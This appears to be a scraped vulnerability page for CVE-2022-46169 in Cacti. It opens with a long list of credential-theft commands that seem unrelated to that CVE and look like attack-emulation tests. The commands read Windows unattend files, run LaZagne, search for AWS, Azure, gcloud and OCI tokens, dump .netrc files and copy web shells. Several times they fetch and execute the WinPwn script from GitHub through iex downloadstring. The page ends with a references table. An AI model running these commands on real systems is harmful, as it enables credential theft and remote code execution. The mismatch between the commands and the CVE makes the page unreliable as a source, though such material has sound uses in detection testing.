generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-46169 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Cacti/cacti/commit/a8d59e8fa5f0054aa9c6981b1cbe30ef0e2a0ec9 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Cacti/cacti/commit/b43f13ae7f1e6bfe4e8e56a80a7cd867cf2db52b |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-46169 |